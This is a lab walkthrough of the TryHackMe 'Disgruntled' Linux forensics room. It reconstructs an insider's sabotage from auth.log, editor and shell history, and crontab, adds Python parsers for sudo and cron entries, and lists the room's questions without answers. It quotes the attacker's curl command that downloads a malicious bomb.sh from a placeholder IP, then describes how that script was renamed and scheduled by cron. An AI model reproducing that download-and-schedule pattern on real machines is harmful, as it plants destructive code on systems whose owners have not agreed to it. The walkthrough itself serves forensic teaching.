This walkthrough covers using Linux forensics to investigate a cyber incident: reading and extracting evidence from log files and shell command history. It is part of the TryHackMe Disgruntled room.

Initial Investigation & Privileged Commands

I started by looking for privileged commands executed by the employee. sudo writes one line per command to the authentication log, recording the invoking user, TTY, present working directory (PWD), target user and the full COMMAND, so I listed those entries with grep -i "COMMAND" /var/log/auth.log and then narrowed them to package installations with grep -i "sudo" /var/log/auth.log | grep "install". This revealed the installation of "dokuwiki". The PWD field of that same log line showed that the working directory at the time of the install was /home/cyberT.

User Creation and Privilege Escalation

Next, I looked for user creation events after the package installation with grep -i "adduser" /var/log/auth.log. The sudo entry records the command as /usr/sbin/adduser, and useradd also writes its own "new user: name=..." line to the same log, which corroborates it. This showed that a user named "it-admin" was created, and the timestamp placed it shortly after the dokuwiki installation.

I then checked when the sudoers file was edited to grant the new user sudo rights. visudo is itself run through sudo, so it appears in the log as COMMAND=/usr/sbin/visudo; I found it with grep -i "visudo" /var/log/auth.log and took the timestamp of the entry run from the cyberT user's working directory. The modification time reported by stat /etc/sudoers is a useful cross-check against that timestamp.

Suspicious Script Activity

I then investigated files opened with the vi text editor. Vim's ~/.viminfo keeps command-line history and file marks, so paths a user edited can survive there even after the file itself is deleted. I started with cat /home/it-admin/.viminfo | grep "save as", which revealed that a file /bin/always_update had been saved. To find files that were opened rather than saved, I went back to the authentication log and filtered for vi commands run under sudo by the it-admin user. This showed that a script file named "bomb.sh" was opened.
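The grep pipeline above works, but it is easy to lose the order of events once the log grows. The script below is an added example, not part of the original walkthrough or the room's files: it parses sudo's auth.log lines into a timeline with the PWD and COMMAND fields split out, tags the commands that matter here (package install, user creation, visudo, editor), and reads useradd's own "new user:" lines as corroboration. The log sample is constructed for this example (hostname "host", PIDs and timestamps are made up); only the line format is sudo's real one.

```python
import re

# Constructed sample in the format sudo and useradd write to /var/log/auth.log
# on Debian/Ubuntu. Hostname, PIDs and timestamps are invented for this example.
SAMPLE_AUTH_LOG = """\
Dec 28 06:16:37 host sudo:   cyberT : TTY=pts/0 ; PWD=/home/cyberT ; USER=root ; COMMAND=/usr/bin/apt install dokuwiki
Dec 28 06:17:41 host sudo:   cyberT : TTY=pts/0 ; PWD=/home/cyberT ; USER=root ; COMMAND=/usr/sbin/adduser it-admin
Dec 28 06:17:41 host useradd[1201]: new user: name=it-admin, UID=1001, GID=1001, home=/home/it-admin, shell=/bin/bash
Dec 28 06:18:06 host sudo:   cyberT : TTY=pts/0 ; PWD=/home/cyberT ; USER=root ; COMMAND=/usr/sbin/visudo
Dec 28 06:20:02 host sudo: it-admin : TTY=pts/1 ; PWD=/home/it-admin ; USER=root ; COMMAND=/usr/bin/vi bomb.sh
Dec 28 06:21:15 host sudo: it-admin : TTY=pts/1 ; PWD=/home/it-admin ; USER=root ; COMMAND=/usr/bin/vi /etc/hosts
"""

# sudo pads the invoking user name, hence the \s+ after "sudo:".
SUDO_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} {1,2}\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sudo:\s+"
    r"(?P<user>\S+) : TTY=(?P<tty>\S+) ; PWD=(?P<pwd>\S+) ; "
    r"USER=(?P<runas>\S+) ; COMMAND=(?P<cmd>.*)$"
)
# useradd logs the account it creates independently of the sudo line.
NEW_USER_RE = re.compile(r"useradd\[\d+\]: new user: name=(?P<name>[^,]+)")

# What each privileged command means for this investigation.
TAGS = {
    "package_install": re.compile(r"\b(apt|apt-get|dpkg|yum|dnf)\b.*\binstall\b"),
    "user_add": re.compile(r"/(adduser|useradd)\b"),
    "sudoers_edit": re.compile(r"/visudo\b|\bsudoers\b"),
    "editor": re.compile(r"/(vi|vim|nano)\b"),
}


def parse_sudo_events(text):
    """One dict per sudo COMMAND line: ts, user, tty, pwd, runas, cmd, tags."""
    events = []
    for line in text.splitlines():
        m = SUDO_RE.match(line)
        if not m:
            continue
        ev = m.groupdict()
        ev["tags"] = [tag for tag, rx in TAGS.items() if rx.search(ev["cmd"])]
        events.append(ev)
    return events


def created_users(text):
    """Account names from useradd's 'new user:' lines."""
    return [m.group("name") for m in NEW_USER_RE.finditer(text)]


def first_with_tag(events, tag):
    """First event carrying the given tag, or None if there is none."""
    return next((ev for ev in events if tag in ev["tags"]), None)


def files_opened_in_editor(events, user=None):
    """Last argument of every editor invocation, optionally for one user only."""
    return [ev["cmd"].split()[-1] for ev in events
            if "editor" in ev["tags"] and (user is None or ev["user"] == user)]


def timeline(text):
    """Chronological (ts, user, pwd, tags, cmd) tuples for every sudo command."""
    return [(e["ts"], e["user"], e["pwd"], e["tags"], e["cmd"])
            for e in parse_sudo_events(text)]


if __name__ == "__main__":
    for row in timeline(SAMPLE_AUTH_LOG):
        print(row)
    print("accounts created:", created_users(SAMPLE_AUTH_LOG))
```

Pointing the parser at a real file is just open("/var/log/auth.log").read() in place of the sample; rotated logs (auth.log.1, auth.log.*.gz) need to be included for anything older than the current week.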

Suspecting bomb.sh to be malicious but finding it already deleted, I looked for how it was created by reading the it-admin user's shell history: cd /home/it-admin and then cat .bash_history. This showed that the script was downloaded with curl from an IP address and written to bomb.sh (curl <IP_ADDRESS>/bomb.sh -o bomb.sh).

The script was then renamed and moved, and since the user most likely wanted it to run later, I checked scheduled tasks. cat /etc/crontab showed a script /bin/OS-update scheduled to run; this was the new name and location of bomb.sh. On a real host, also check /etc/cron.d, the per-user crontabs under /var/spool/cron/crontabs and systemd timers, none of which appear in /etc/crontab.

Analyzing the Malicious Script

I checked the last modification time of /bin/OS-update with ls -la /bin/OS-update (stat /bin/OS-update gives the same mtime with seconds), then read it with cat /bin/OS-update. The script removed a package and echoed taunting messages, including "I told you you would regret this" and "goodbye." From the output redirection on one of the echo commands, I identified that a file named good_evidence would be created when the script runs. The crontab entry (minute 0, hour 8, every day) confirmed that /bin/OS-update was scheduled to run daily at 8:00 AM.
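Reading the five schedule fields off a crontab line by eye is error-prone, and per-user crontabs have one column fewer than /etc/crontab. The following is an added example, not code from the original walkthrough: it parses both crontab layouts, finds the entries that reference a given path, and renders a fixed minute/hour pair in the "HH:MM AM/PM" form the room asks for, returning None when the fields are wildcards, lists or steps and so have no single daily trigger time. The crontab text is constructed for this example; the /bin/OS-update line mirrors the entry described above, the other two are Ubuntu's stock entries.

```python
import re

# Constructed /etc/crontab in system-crontab layout: five time fields, then the
# user to run as, then the command. The OS-update line is the one from the
# walkthrough; the first two are Ubuntu's default entries.
SAMPLE_SYSTEM_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
0 8     * * *   root    /bin/OS-update
"""

FIELDS = ("minute", "hour", "dom", "month", "dow")


def parse_crontab(text, system=True):
    """Parse crontab lines into dicts.

    system=True for /etc/crontab and /etc/cron.d/* (which carry a user column);
    system=False for per-user files under /var/spool/cron/crontabs (which do not).
    """
    jobs = []
    for raw in text.splitlines():
        line = raw.strip()
        # Skip blanks, comments and VAR=value environment assignments.
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue
        if line.startswith("@"):
            # @daily, @reboot etc.: one schedule token instead of five fields.
            parts = line.split(None, 2 if system else 1)
            job = {"special": parts[0]}
            rest = parts[1:]
        else:
            parts = line.split(None, 6 if system else 5)
            job = dict(zip(FIELDS, parts[:5]))
            rest = parts[5:]
        if system:
            if len(rest) < 2:
                continue  # malformed line: no command after the user column
            job["user"], job["command"] = rest[0], rest[1]
        else:
            if not rest:
                continue
            job["user"], job["command"] = None, rest[0]
        jobs.append(job)
    return jobs


def jobs_referencing(jobs, path):
    """Jobs whose command mentions the given path (the renamed script, here)."""
    return [j for j in jobs if path in j["command"]]


def trigger_time(job):
    """'HH:MM AM/PM' when minute and hour are both fixed numbers; None otherwise
    (wildcards, lists, ranges, steps and @-shorthand have no single daily time)."""
    minute, hour = job.get("minute"), job.get("hour")
    if minute is None or hour is None or not (minute.isdigit() and hour.isdigit()):
        return None
    m, h = int(minute), int(hour)
    if not (0 <= m <= 59 and 0 <= h <= 23):
        return None
    return f"{h % 12 or 12:02d}:{m:02d} {'AM' if h < 12 else 'PM'}"


if __name__ == "__main__":
    for job in jobs_referencing(parse_crontab(SAMPLE_SYSTEM_CRONTAB), "/bin/OS-update"):
        print(job["user"], job["command"], "->", trigger_time(job))
```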

In summary, the disgruntled employee installed a package, created a new user (it-admin), granted it sudo privileges, downloaded a malicious script (bomb.sh), renamed and moved it to /bin/OS-update, and scheduled it via cron to cause damage and leave taunting messages.

TryHackMe Disgruntled Room Answers

The user installed a package on the machine using elevated privileges. According to the logs, what is the full COMMAND?

What was the present working directory (PWD) when the previous command was run?

Which user was created after the package from the previous task was installed?

A user was then later given sudo privileges. When was the sudoers file updated? (Format: Month Day HH:MM:SS)

A script file was opened using the “vi” text editor. What is the name of this file?

What is the command used that created the file bomb.sh?

The file was renamed and moved to a different directory. What is the full path of this file now?

When was the file from the previous question last modified? (Format: Month Day HH:MM)

What is the name of the file that will get created when the file from the first question executes?

At what time will the malicious file trigger? (Format: HH:MM AM/PM)

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by Motasem Hamdan, a cybersecurity content creator and YouTuber.